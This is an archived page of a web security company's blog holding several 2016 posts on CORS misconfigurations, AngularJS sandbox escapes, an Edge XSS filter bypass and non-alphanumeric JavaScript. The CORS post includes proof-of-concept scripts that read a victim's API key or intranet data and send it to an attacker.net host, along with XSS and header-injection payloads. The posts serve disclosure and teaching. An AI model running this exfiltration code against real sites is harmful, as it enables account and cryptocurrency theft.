
PortSwigger Web Security Blog

Friday, October 14, 2016

Exploiting CORS Misconfigurations for Bitcoins and Bounties

(or CORS Misconfiguration Misconceptions)

This is a greatly condensed version of my AppSec USA talk. If you have time (or struggle to understand anything) I highly recommend checking out the slides and watching the video when it lands on YouTube in a month or so.

Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It’s widely understood that certain CORS configurations are dangerous, but some associated subtleties and implications are easily misunderstood. In this post I’ll show how to critically examine CORS configurations from a hacker’s perspective, and steal bitcoins.

CORS for Hackers

Websites enable CORS by sending the following HTTP response header:
Access-Control-Allow-Origin: https://example.com
This permits the listed origin (domain) to make visitors’ web browsers issue cross-domain requests to the server and read the responses - something the Same Origin Policy would normally prevent. By default this request will be issued without cookies or other credentials, so it can’t be used to steal sensitive user-specific information like CSRF tokens. The server can enable credential transmission using the following header:
Access-Control-Allow-Credentials: true
This creates a trust relationship - an XSS vulnerability on example.com is bad news for this site.

Hidden in plain sight

Trusting a single origin is easy. What if you need to trust multiple origins? The specification suggests that you can simply specify a space-separated list of origins, e.g.:
Access-Control-Allow-Origin: http://foo.com http://bar.net
However, no browsers actually support this.

You might also want to use a wildcard to trust all your subdomains, by specifying something like:
Access-Control-Allow-Origin: *.portswigger.net
But that won't work either - the only wildcard origin is '*'.

There's a hidden safety catch in CORS, too. If you try to disable the SOP entirely and expose your site to everyone by using the following terrifying-looking header combination:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Then you’ll get the following error in your browser console:
“Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true.”
This exception is mentioned in the specification, and also backed up by Mozilla’s documentation:
"when responding to a credentialed request,  server must specify a domain, and cannot use wild carding"
In other words, using a wildcard effectively disables the Allow-Credentials header.

As a result of these limitations, many servers programmatically generate the Access-Control-Allow-Origin header based on the user-supplied Origin value. If you see an HTTP response with any Access-Control-* headers but no origins declared, this is a strong indication that the server will generate the header based on your input. Other servers will only send CORS headers if they receive a request containing the Origin header, making the associated vulnerabilities extremely easy to miss.

Credentials and bitcoins

So, plenty of websites derive allowed origins from user input. What could possibly go wrong? I decided to assess a few bug bounty sites and find out. Note that as these sites all have bug bounty programs, every vulnerability I mention has been missed by numerous other bounty hunters.

I quickly replicated Evan Johnson's finding that many applications make no attempt to validate the origin before reflecting it, and identified a vulnerable bitcoin exchange (which sadly prefers to remain unnamed):
GET /api/requestApiKey HTTP/1.1
Host: <redacted>
Origin: https://fiddle.jshell.net
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://fiddle.jshell.net
Access-Control-Allow-Credentials: true

{"[private API key]"}
Making a proof of concept exploit to steal users' private API keys was trivial:
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://<redacted>/api/requestApiKey', true);
req.withCredentials = true;
req.send();

function reqListener() {
    // exfiltrate the key to an attacker-controlled logging endpoint
    location = '//attacker.net/log?key=' + this.responseText;
}
After retrieving a user's API key, I could disable account notifications, enable 2FA to lock them out, and transfer their bitcoins to an arbitrary address. That’s pretty severe for a header misconfiguration. Resisting the urge to take the bitcoins and run, I reported this to their bug bounty program and it was patched within an astounding 20 minutes.

Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted. For example, a site which I'll call advisor.com trusts every origin ending in advisor.com, including definitelynotadvisor.com. Even worse, a second bitcoin exchange (let's call it btc.net) trusted every origin starting with https://btc.net, including https://btc.net.evil.net. Unfortunately the site unexpectedly and permanently ceased operations before I could build a working proof of concept. I won't speculate as to why.
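Both mistakes boil down to naive string comparisons. A hypothetical reconstruction of the two broken validators (the real sites' code was of course not disclosed):

```javascript
// Hypothetical sketches of the flawed checks - not the sites' actual code.
function advisorCheck(origin) {
  // suffix check: definitelynotadvisor.com slips through
  return origin.endsWith('advisor.com');
}

function btcCheck(origin) {
  // prefix check: https://btc.net.evil.net slips through
  return origin.startsWith('https://btc.net');
}
```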

The null origin

If you were paying close attention earlier, you might have wondered what the 'null' origin is for. The specification mentions it being triggered by redirects, and a few Stack Overflow posts show that local HTML files also get it. Perhaps due to the association with local files, I found that quite a few websites whitelist it, including Google's PDF reader:
GET /reader?url=zxcvbn.pdf
Host: docs.google.com
Origin: null

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
and a certain third bitcoin exchange. This is great for attackers, because any website can easily obtain the null origin using a sandboxed iframe:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>
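The "*cors stuff here*" placeholder would hold a script along these lines - a hedged sketch, with target.example and attacker.net standing in for real hosts:

```javascript
// Illustrative only: runs inside the sandboxed iframe, so its Origin is "null".
function exploitNullOrigin() {
  var req = new XMLHttpRequest();
  req.onload = function () {
    // relay the authenticated response to the attacker's server
    new Image().src = '//attacker.net/log?data=' + encodeURIComponent(this.responseText);
  };
  req.open('GET', 'https://target.example/sensitive', true);
  req.withCredentials = true;  // ride the victim's cookies
  req.send();
}
```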

Using a sequence of CORS requests, it was possible to steal encrypted backups of users' wallets, enabling an extremely fast offline brute-force attack against their wallet password. If anyone's password wasn't quite up to scratch, I'd get their bitcoins.

This particular misconfiguration is surprisingly common - if you look for it, you'll find it. The choice of the keyword 'null' is itself a tad unfortunate, because failing to configure an origin whitelist in certain applications may result in...
Access-Control-Allow-Origin: null

Breaking HTTPS

During this research I found two other prevalent whitelist implementation flaws, which often occur at the same time. The first is blindly whitelisting all subdomains - even non-existent ones. Many companies have subdomains pointing to applications hosted by third parties with awful security practices. Trusting that these don't have a single XSS vulnerability and never will in the future is a really bad idea.

The second common error is failing to restrict the origin protocol. If a website is accessed over HTTPS but will happily accept CORS interactions from http://wherever, someone performing an active man-in-the-middle (MITM) attack can pretty much bypass its use of HTTPS entirely. Strict Transport Security and secure cookies will do little to prevent this attack. Check out the presentation recording when it lands for a demo of this attack.

Abusing CORS Without Credentials

We've seen that with credentials enabled, CORS can be highly dangerous. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Even token fixation attacks are infeasible, because any new cookies set are ignored by the browser.

One notable exception is when the victim's network location functions as a kind of authentication. You can use a victim’s browser as a proxy to bypass IP-based authentication and access intranet applications. In terms of impact this is similar to DNS rebinding, but much less fiddly to exploit.
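A sketch of that technique, with a hypothetical internal host and logging endpoint:

```javascript
// Illustrative only: runs in the victim's browser, which sits inside the network.
// Reading the response requires the intranet app to send permissive CORS headers
// (e.g. Access-Control-Allow-Origin: *) - no credentials are needed, because the
// victim's network location is the authentication.
function pillageIntranet() {
  var req = new XMLHttpRequest();
  req.onload = function () {
    var exfil = new XMLHttpRequest();
    exfil.open('POST', '//attacker.net/log', true);  // attacker.net is a placeholder
    exfil.send(this.responseText);
  };
  req.open('GET', 'http://intranet.example/', true); // hypothetical internal host
  req.send();
}
```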

Vary: Origin 

If you take a look at the 'Implementation Considerations' section in the CORS specification, you'll notice that it instructs developers to specify the 'Vary: Origin' HTTP header whenever Access-Control-Allow-Origin headers are dynamically generated.

That might sound pretty simple, but immense numbers of people forget, including the W3C itself, leading to this fantastic quote:
"I must say, it doesn't make me very confident that soon more sites will be supporting CORS if not even the W3C manages to configure its server right" - Reto Gmür
What happens if we ignore this advice? Mostly things just break. However, in the right circumstances it can enable some quite serious attacks.

Client-Side Cache Poisoning

You may have occasionally encountered a page with reflected XSS in a custom HTTP header. Say a web page reflects the contents of a custom header without encoding:
GET / HTTP/1.1
Host: example.com
X-User-id: <svg/onload=alert(1)>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-User-id
Content-Type: text/html
Invalid user: <svg/onload=alert(1)>
Without CORS, this is impossible to exploit as there’s no way to make someone’s browser send the X-User-id header cross-domain. With CORS, we can make them send this request. By itself, that's useless since the response containing our injected JavaScript won't be rendered. However, if Vary: Origin hasn't been specified the response may be stored in the browser's cache and displayed directly when the browser navigates to the associated URL. I've made a fiddle to attempt this attack on a URL of your choice. Since this attack uses client-side caching, it's actually quite reliable.
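In outline, the fiddle does something like this (using example.com as in the request above):

```javascript
// Sketch of client-side cache poisoning: prime the cache, then render it.
function poisonClientCache() {
  var req = new XMLHttpRequest();
  req.onload = function () {
    // the XSS-bearing response may now sit in the browser cache for this URL,
    // so navigating there renders our injected payload as HTML
    location = 'https://example.com/';
  };
  req.open('GET', 'https://example.com/', true);
  req.setRequestHeader('X-User-id', '<svg/onload=alert(1)>');
  req.send();
}
```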

Server-Side Cache Poisoning

If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a stored XSS vulnerability.

If an application reflects the Origin header without even checking it for illegal characters like \r, we effectively have an HTTP header injection vulnerability against IE/Edge users, as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator:
GET / HTTP/1.1
Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
Internet Explorer sees the response as:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people. The payload I've used will change the page's character set to UTF-7, which is notoriously useful for creating XSS vulnerabilities.

Good Intentions and Bad Results

I was initially surprised by the number of sites that dynamically generate Access-Control-Allow-Origin headers. The root cause of this behavior may be two key limitations of CORS - multiple origins in a single header aren't supported, and neither are wildcarded subdomains. This leaves many developers with no choice but to do dynamic header generation, risking all the implementation flaws discussed above. I think that if the specification authors and browsers decided to allow origin lists and partial wildcards, dynamic header generation and associated vulnerabilities would plummet.

Another potential improvement for browsers is to apply the wildcard+credentials exception to the null origin. At present, the null origin is significantly more dangerous than the wildcard origin, something I imagine a lot of people find surprising.

Something else browsers could try is blocking what I've coined "reverse mixed-content" - HTTP sites using CORS to steal data from HTTPS sites. I have no idea what scale of breakage this would cause, though.

Simplicity and security may go hand in hand, but by neglecting to support multiple origin declarations, web browsers have just pushed the complexity onto developers, with harmful results. I think the main take-away from this is that secure specification design and implementation is fiendishly difficult.


CORS is a powerful technology best used with care, and severe exploits don't always require specialist skills and convoluted exploit chains - often a basic understanding of a specification and a little attentiveness is all you need. In case you're running low on coffee, as of today Burp Suite's scanner will identify and report all the flaws discussed here.

- @albinowax

Tuesday, July 26, 2016

Introducing Burp Infiltrator

The latest release of Burp Suite introduces a new tool, called Burp Infiltrator.

Burp Infiltrator is a tool for instrumenting target web applications in order to facilitate testing using Burp Scanner. Burp Infiltrator modifies the target application so that Burp can detect cases where its input is passed to potentially unsafe APIs on the server side. In industry jargon, this capability is known as IAST (interactive application security testing).

Burp Infiltrator currently supports applications written in Java or other JVM-based languages such as Groovy. Java versions from 4 and upwards are supported. In future, Burp Infiltrator will support other platforms such as .NET.

How Burp Infiltrator works

  1. The Burp user exports the Burp Infiltrator installer from Burp, via the "Burp" menu.
  2. The application developer or administrator installs Burp Infiltrator by running it on the machine containing the application bytecode.
  3. Burp Infiltrator patches the application bytecode to inject instrumentation hooks at locations where potentially unsafe APIs are called.
  4. The application is launched in the normal way, running the patched bytecode.
  5. The Burp user performs a scan of the application in the normal way.
  6. When the application calls a potentially unsafe API, the instrumentation hook inspects the relevant parameters to the API. Any Burp payloads containing Burp Collaborator domains are fingerprinted based on their unique structure.
  7. The instrumentation hook mutates the detected Burp Collaborator domain to incorporate an identifier of the API that was called.
  8. The instrumentation hook performs a DNS lookup of the mutated Burp Collaborator domain.
  9. Optionally, based on configuration options, the instrumentation hook makes an HTTP/S request to the mutated Burp Collaborator domain, including the full value of the relevant parameter and the application call stack.
  10. Burp polls the Collaborator server in the normal way to retrieve details of any Collaborator interactions that have occurred as a result of its scan payloads. Details of any interactions that have been performed by the Burp Infiltrator instrumentation are returned to Burp.
  11. Burp reports to the user that the relevant item of input is being passed by the application to a potentially unsafe API, and generates an informational scan issue of the relevant vulnerability type. If other evidence was found for the same issue (based on in-band behavior or other Collaborator interactions) then this evidence is aggregated into a single issue.

Issues reported by Burp Infiltrator

Burp Infiltrator allows Burp Scanner to report usage of potentially dangerous server-side APIs that may constitute a security vulnerability. It also allows Burp to correlate the external entry point for a vulnerability (for example a particular URL and parameter) with the back-end code where the vulnerability occurs.

In the following example, Burp Scanner has identified an XML injection vulnerability based on Burp's existing scanning techniques, and also reports the unsafe API call that leads to the vulnerability within the server-side application:

Burp Infiltrator enables Burp to report:
  • The potentially unsafe API that was called.
  • The full value of the relevant parameter to that API.
  • The application call stack when the API was invoked.
This information can be hugely beneficial for numerous purposes:
  • It provides additional evidence to corroborate a putative vulnerability reported using conventional dynamic scanning techniques.
  • It allows developers to see exactly where in their code a vulnerability occurs, including the names of code files and line numbers.
  • It allows security testers to see exactly what data is passed to a potentially unsafe API as a result of submitted input, facilitating manual exploitation of many vulnerabilities, such as SQL injection into complex nested queries.

Important considerations

Please take careful note of the following points before using Burp Infiltrator:
  • You should read all of the documentation about Burp Infiltrator before using it or inducing anyone else to use it. You should only use Burp Infiltrator in full understanding of its nature and the risks inherent in its utilization.
  • You can use a private Burp Collaborator server with Burp Infiltrator, provided the Collaborator server is configured using a domain name, not via an IP address.
  • You can install Burp Infiltrator within a target application non-interactively, for use in CI pipelines and other automated use cases.
  • During installation of Burp Infiltrator, you can configure whether full parameter values and call stacks should be reported, and various other configuration options.
For more details, including step-by-step instructions, please refer to the Burp Infiltrator documentation.

Friday, July 15, 2016

Executing non-alphanumeric JavaScript without parenthesis

I decided to look into non-alphanumeric JavaScript again and see if it was possible to execute it without parentheses. A few years ago I did a presentation on non-alpha code; if you want some more information on how it works, take a look at the slides. Using similar techniques, we were able to hack Uber.

A few things have changed in the browser world since the last time I looked into it. The interesting features are template literals and the find function on the array object. Template literals are useful because you can call functions without parentheses, and the find function can be generated using "undefined", so it's much shorter than the original method of using "filter".

The basis of non-alpha involves using JavaScript objects to generate strings that eventually lead to code execution. For example, +[] creates zero in JavaScript, and [][[]] creates undefined. By converting objects such as undefined to a string, like this: [[][[]]+[]][+[]], we can reuse those characters and get access to other objects. We need to call the constructor property of a function if we want to execute arbitrary code, like this: [].find.constructor('alert(1)')().
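These building blocks can be checked directly in a console. The snippet below substitutes return 1 for alert(1) so it runs outside a browser:

```javascript
const zero = +[];                     // +[]   -> 0
const undef = [][[]];                 // [][[]] -> undefined
const undefStr = [[][[]] + []][+[]];  // "undefined" as a string we can index into
// the end goal: reach the Function constructor through a built-in function
const result = [].find.constructor('return 1')();  // 1
```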

So the first task is to generate the string "find". To do that, we need to generate numbers in order to get the right index on the string "undefined". Here's how to generate the number 1.

Basically, the code creates zero, ! flips it to true because 0 is falsy in JavaScript, then the prefix + operator turns true into 1. Then we need to create the string "undefined" as mentioned above and get the 4th index by adding those numbers together, to produce "f".
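Spelled out as runnable code:

```javascript
const one = +!+[];                       // !0 -> true, +true -> 1
const four = !+[] + !+[] + !+[] + !+[];  // each true coerces to 1, summing to 4
const f = [[][[]] + []][+[]][four];      // "undefined"[4] -> "f"
```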


Then we need to do the same thing to generate the other letters increasing/decreasing the index.


Now we need to combine the characters and access the "find" function on an array literal.

[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]//find function

This gives us some more characters to play with, the find function's toString value is function find() {[native code]}, the important character here is "c". We can use the code above to get the find function and convert it to a string then get the relevant index.


Now we continue and get the other characters of "constructor" using "object", true and false and converting them to strings.


It's now possible to access the Function constructor by getting the constructor property twice on an array literal. Combine the characters above to form "constructor", then use an array literal []['constructor']['constructor'] to access the Function constructor.
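You can confirm the double-constructor lookup in a console, with a harmless return 6*7 standing in for the attacker's payload:

```javascript
const F = []['constructor']['constructor'];  // Array's constructor's constructor is Function
const answer = F('return 6*7')();            // 42
```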


Now we need to generate the code we want to execute, in this case alert(1); true and false can generate "alert". Then we need the parentheses from the [].find function.


That's the code generated; now we need to execute it. Template literals will call a function even if it's an expression, which allows you to place them next to each other and is very useful for non-alpha code. The Function constructor returns a function and actually needs to be called twice in order to execute the code - e.g. Function`alert(1)``` is perfectly valid JavaScript. You might think you can just pass a generated string inside a template literal and execute the Function constructor, but this won't quite work, as demonstrated by the following code: alert`${'ale'+'rt(1)'}`. Template literals pass each part of the string as an argument: if you place some text before and after the template literal expression, you'll see two arguments are sent to the calling function. The first argument contains the text before and after the template expression (separated by a comma when displayed), and the second argument contains the result of the template literal expression, as the following code demonstrates:

function x(){ alert(arguments[0]);alert(arguments[1]) }
x`foo${'bar'}baz` // first alerts "foo,baz" (the literal parts), then "bar"

All that's left to do is pass our generated Function constructor to a template literal and instead of using "x" as above we use "$" at either side of the template literal expression. This creates two unused arguments for the function. The final code is below.


Enjoy - @garethheyes

Tuesday, May 31, 2016

Web Storage: the lesser evil for session tokens

I was recently asked whether it was safe to store session tokens using Web Storage (sessionStorage/localStorage) instead of cookies. Upon googling this I found the top results nearly all assert that Web Storage is highly insecure relative to cookies, and therefore not suitable for session tokens. For the sake of transparency, I've decided to publicly document the rationale that led me to the opposite conclusion.

The core argument used against Web Storage says that because Web Storage doesn't support cookie-specific features like the Secure flag and the HttpOnly flag, it's easier for attackers to steal tokens stored there. The path attribute is also cited. I'll take a look at each of these features, try to examine the history of why they were implemented and what purpose they serve, and ask whether they really make cookies the best choice for session tokens.

The Secure Flag

The secure flag is quite important for cookies, and outright irrelevant for web storage. Web Storage adheres to the Same Origin Policy, which isolates data based on an origin consisting of a protocol and a domain name. Cookies need the secure flag because they don't properly adhere to the Same Origin Policy - cookies set on https://example.com will be transmitted to and accessible via http://example.com by default. Conversely, a value stored in localStorage on https://example.com will be completely inaccessible to http://example.com because the protocols are different.

In other words, cookies are insecure by default, and the secure flag is simply a bodge to make them as resilient to MITM attacks as Web Storage. Web Storage used over HTTPS effectively has the secure flag by default. Further information on related nuances in the Same Origin Policy can be found in The Tangled Web by Michal Zalewski.

The Path Attribute

The path attribute is widely known to be pretty much useless for security. It's another example of where cookies are out of sync with the Same Origin Policy - paths are not considered part of an origin so there's no security boundary between them. The only way to isolate two applications from each other at the application layer is to place them on separate origins.

The HttpOnly Flag

The HttpOnly flag is an almost useless XSS mitigation. It was invented back in 2002 to prevent XSS being used to steal session tokens. At the time, stealing cookies may have been the most popular attack vector - it was four years later that CSRF was described as the sleeping giant.

Today, I think any competent attacker will exploit XSS using a custom CSRF payload or drop a BeEF hook. Session token stealing attacks introduce a time-delay and environment shift that makes them impractical and error prone in comparison - see Why HttpOnly Won't Protect You for more background on why. This means that if an attacker is proficient, HttpOnly won't even slow them down. It's like a WAF that's so ineffective attackers don't even notice it exists.

The only instance I've seen where HttpOnly was a significant security boundary is on bugzilla.mozilla.org. Untrusted HTML attachments are served from a subdomain which has access to the parent domain's session cookies thanks to cookies' not-quite-same-origin-policy. Ultimately as with the secure flag, the HttpOnly flag is only really required to make cookies as secure as web storage.

Differences that Matter

One major difference between the two options is that unlike cookies, web browsers don't automatically attach the contents of Web Storage to HTTP requests - you need to write JavaScript to attach the session token to an HTTP header. This actually conveys a huge security benefit, because it means the session tokens don't act as an ambient authority, which makes entire classes of exploits irrelevant. Browsers' behaviour of automatically attaching cookies to cross-domain requests is what enables attacks like CSRF and cross-origin timing attacks. There's a specification for yet another cookie attribute to fix this very problem in development at the moment, but for now, to get this property your best bet is Web Storage.
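For example, a minimal browser-side sketch of attaching a token manually (the header name and storage key are illustrative):

```javascript
// Browser-side sketch: the token travels only when our code attaches it.
function apiRequest(url) {
  var req = new XMLHttpRequest();
  req.open('GET', url, true);
  // deliberate, explicit attachment - no ambient authority
  req.setRequestHeader('X-Session-Token', sessionStorage.getItem('token'));
  req.send();
  return req;
}
```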

Meanwhile, the unhealthy state of the cookie protocol leads to crazy situations where the cookie header can contain a blend of trusted and untrusted data. This is something the ill-conceived double-submit CSRF defence fell foul of. The solution for this is yet another cookie attribute: Origin.

Unlike cookies, web storage doesn't support automatic expiry. The security impact of this is minimal as expiry of session tokens should be done server-side, but it is something to watch out for. Another distinction is that sessionStorage will expire when you close the tab rather than when you close the browser, which may be awesome or inconvenient depending on your use case. Also, Safari disables Web Storage in private browsing mode, which isn't very helpful.

This post is intended to argue that Web Storage is often a viable and secure alternative to cookies. Web Storage isn't ideal for session token storage in every situation - retrofitting it to a non-single-page application may add a significant request overhead, Safari disables Web Storage in private browsing mode, and it's insecure in Internet Explorer 8. Likewise, if you do use cookies, please use both Secure and HttpOnly.


At first glance it looks like cookies have more security features, but they're ultimately patches over a poor core design. For an in depth assessment of cookies, check out HTTP cookies, or how not to design protocols. Web Storage offers an alternative that, if not secure by default, is less insecure by default.

 - @albinowax

Friday, May 20, 2016

Using disk-based projects with OpenJDK

Since the introduction of Burp projects in Burp Suite 1.7 we've had some reports of native crashes in the OpenJDK JVM when using disk-based projects.

Disk-based projects use memory-mapped files, which have been a core part of the Java API spec for a very long time. Because memory-mapped files need to be implemented in native code, there is inherently more potential for compatibility issues, both with the core OS and with disk drivers.

It appears that a bug in OpenJDK may cause the JVM process to crash when using memory-mapped files. This appears to affect only certain platforms, notably Kali Linux.

The easiest way to resolve this issue is to use Oracle Java, which does not contain the bug.

We appreciate that in some instances using Oracle Java may not be practical. We have received reports that this bug has been patched in JDK 9, and it may be possible to backport this patch to Java 7 or 8.

Monday, April 25, 2016

Adapting AngularJS Payloads to Exploit Real World Applications

Every experienced pentester knows there is a lot more to XSS than <script>alert(1)</script> - filtering, encoding, browser-quirks and WAFs all team up to keep things interesting. AngularJS Template Injection is no different. In this post, we will examine how we adapted template injection payloads to bypass filtering and encoding and exploit Piwik and Uber.

Lower case conversion

Piwik, an open-source analytics platform with a healthy 2.7 million downloads, uses AngularJS 1.2.26, and displays search queries from visitors.

By spoofing a referral from Google, we can inject a keyword containing an Angular expression in here. However, injecting the appropriate sandbox escape for Angular 1.2.26 doesn't work:


Piwik converts this input to lower case, preventing the charAt function from being overwritten and valueOf from being called. We easily got round those restrictions by using unicode escapes to overwrite the charAt function:


and used ''.concat instead of valueOf:


Here is the final payload (Broken slightly to discourage exploits):



This vulnerability is really quite serious - an unauthenticated attacker can inject a payload which will hijack the account of anyone who views it. If an admin account is hijacked, we may be able to install a malicious module and take complete control of the webserver. Update to Piwik 2.16.1 to get the fix.

No quotes allowed

The ride-sharing company Uber lets developers submit and manage apps via developer.uber.com. They use a third party (readme.io) to display associated documentation at https://developer.uber.com/docs/.

This site uses AngularJS and reflects the current URL using server-side templating, but crucially doesn't URL decode it first. Firefox and Chrome both URL-encode quotes and apostrophes, meaning that if we want a cross-browser payload (and a decent vulnerability bounty), we need an alternative way of getting the string object. Also, we can't use any spaces, regardless of the browser.

Using the toString method of an object, we can create a string without the need for single or double quotes. ({}.toString) creates the string, then we can use its constructor to access the String object and call fromCharCode.
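In plain JavaScript, the quoteless-string trick looks like this:

```javascript
const objStr = {}.toString();    // "[object Object]" - a string built with no quotes
const S = objStr.constructor;    // the String object
const word = S.fromCharCode(97, 108, 101, 114, 116);  // "alert"
```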


Mario Heiderich came up with a shorter version that removes the object literal reference. This can also be reduced (for those of you who like code "golfing") to:


No quotes or constructor

However, there was one more catch. Uber was using Angular 1.2.0, which bans accessing constructor via a regular JavaScript property like obj.constructor, although an object accessor like obj['constructor'] was allowed. So I needed to generate the string "constructor", but I couldn't access the String constructor to call fromCharCode, because doing so requires the string "constructor". A chicken and egg situation.

I thought about how I could generate strings and concatenate them together without using +. I decided to use arrays. First off, I create a blank array.
The next problem was how to generate the required characters for "constructor" without the ability to call fromCharCode (because we can't use constructor yet) and with no quotes! The trick here is to use existing objects to generate the required characters - you could almost think of this as a twisted kind of ROP. Using the toString method of the currently scoped object will generate the string [object Object], giving us some of the characters required for "constructor".

o=toString();//[object Object]

The observant among you might be wondering how we could get an "n", since Angular tolerates undefined objects, meaning we can't convert an undefined object into a string. The solution is to use the "anchor" function on the string, as the generated output contains an "n".

t=o.anchor(true);//<a name="true">[object Undefined]</a>

Next I needed to generate false too, using the same method - you could use false.toString() instead, of course. And now I add all the strings into the array.

I then need to join these characters together but I can't generate a blank string using quotes. The solution is to use an array literal which does the same thing.
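Outside Angular's sandbox, the whole character-harvesting routine can be reproduced in a few lines ({}.toString() stands in for the scoped toString() call):

```javascript
const o = {}.toString();   // "[object Object]" -> c, o, t
const t = o.anchor(true);  // '<a name="true">[object Object]</a>' -> n, r, u
const f = (![] + []);      // "false" -> s
// assemble "constructor"; joining on an array literal joins on the empty string
const word = [o[5], o[1], t[3], f[3], o[6], t[10], t[11], o[5], o[6], o[1], t[10]].join([]);
// word === "constructor"
```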


So we have our string "constructor"; the next stage is to use the required exploit for 1.2.0 by Jann Horn and pass our string to it. Now that we can use "constructor", we can generate arbitrary characters using fromCharCode. Here is the final exploit in all its glory.


Uber/readme.io somewhat impressively patched this issue within 24 hours of it being reported.

Even when you're inside a JavaScript sandbox, there is still plenty of room for adapting exploits to bypass environmental constraints. These techniques should serve as a foundation for tackling whatever you encounter.

Happy sandbox hacking - @garethheyes & @albinowax

Friday, April 15, 2016

Edge XSS filter bypass

I originally reported this issue to Microsoft on 4th September 2015 but it remains unfixed. As it has been so long since my original report I have decided to blog about the details now.

IE had a flaw in the past where you could use the location object as a function and combine toString/valueOf in an object literal to execute code. I think it was first discovered by Sirdarckcat, but I may be wrong. Basically, you use the object literal as a fake array: it calls the join function, which constructs a string from the object literal and passes it to valueOf, which in turn passes it to the location object. Here is the code:


This also works on the latest version of Edge; however, both browsers will detect it as an XSS attack. The XSS filter regexes detect a string followed by any number of characters, followed by either a "{" or ",", then toString/valueOf and a colon character. The "a" from valueOf and the "o" from toString are replaced by the "#" character. Here is a simplified version of the regex:


Here are the Regexes as of October 2015.

Edge, though, supports ES6, and there are some useful new features. Computed properties in ES6 allow you to pass an expression to calculate the property name. For example:
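A trivial example of a computed property name:

```javascript
const prop = 'to' + 'String';  // property name built at runtime
const obj = { [prop]: function () { return 'computed'; } };
// obj.toString() returns "computed" - the literal text "toString:" never
// appears in the source, which is exactly what defeats a regex-based filter
```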


I think you can see where this is going. By combining the two techniques, we can bypass the Edge XSS filter. As shown earlier, the regexes look for toString/valueOf - but we can obfuscate those names using computed properties.



Happy filter hacking - @garethheyes


Copyright 2016 PortSwigger Ltd. All rights reserved.